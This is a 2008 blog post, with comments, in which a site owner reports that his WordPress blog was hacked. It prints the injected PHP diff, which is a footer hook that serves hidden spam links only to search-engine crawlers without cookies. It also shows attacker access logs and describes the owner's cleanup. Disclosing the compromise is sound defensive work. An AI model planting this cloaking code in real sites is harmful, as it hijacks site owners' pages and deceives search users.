« Debian GNU/kFreeBSD!
Openbox »

wpc7c16b8466d864eeefd20050625c7775




Published
by
Albert
on February 25, 2008
in Docunext
. 
--- default-filters.php (revision 6)
+++ default-filters.php (working copy)
@@ -42,6 +42,26 @@

 add_filter('comment_flood_filter', 'wp_throttle_comment_flood', 10, 3);

+
+add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
+function wpc7c16b8466d864eeefd20050625c7775() {
+       $seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
+       $sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
+       if(!($sebot==1 && sizeof($_COOKIE)==0)) return;
+       @include('./wp-includes/class-mail.php');
+       if(sizeof($wparr)>0){
+               shuffle($wparr);
+               echo "

“;
+               foreach($wparr as $k=>$v){
+                       echo ““.ucwords($v[’key’]).”\n”;
+                       if($i++==$inum) break;
+               }
+               echo “


“.$_footer;
+       }
+}
+
+
+

Bad news. Who is responsible? 

www.infonomix.org 194.110.162.23 [25/Feb/2008:07:21:06 -0500] "POST /blog/wp-includes/default-filters.php?970a0ddc6270e0ca=178d4b7fa8fc73a4 HTTP/1.1" 200 179
www.infonomix.org 194.110.162.23 [25/Feb/2008:07:21:07 -0500] "POST /blog/ HTTP/1.1" 200 27176

4 Responses to “wpc7c16b8466d864eeefd20050625c7775”

Feed for this Entry Trackback Address
  1. 1 Albert
    Feb 25th, 2008 at 1:57 pm

    I’ve added a bevy of IP CIDR blocks to my POST restrictions, and I’m definitely going to review all of Wordpress for this.

  2. 2 Albert
    Feb 25th, 2008 at 7:40 pm

    As far as I can tell, this is a well know vulnerability, and Automattic has since fixed the issue. In my case, to remedy the situation, I changed the permissions to read only in wp-includes, wp-admin, as well as reviewed all the files to remove the injected scripts.

  3. 3 Michi
    Mar 6th, 2008 at 9:26 pm

    I found this by searching “194.110.162.23″ because my wordpress got hijacked as well. I stil don’t really know what and how that happened. Do you have any more information? How did they get access?

  4. 4 Albert
    Mar 6th, 2008 at 10:32 pm

    Hi Michi, there are probably a bunch of different ways its done, but in my case, here’s what I *think* happened:

    1. Abuser registered and gained access to some basic functionality -or- used a cookie to execute some malicious code, not sure
    2. My server files had incorrect permissions - the web server was able to write to the wp-includes directory and files
    3. Abuser modified files to act as a gateway to execute their own php scripts (and shell scripts?) on server

    I made several changes to my setup, an important one being to change all the wordpress php files to be only readable by the webserver.

Leave a Reply

« Debian GNU/kFreeBSD!
Openbox »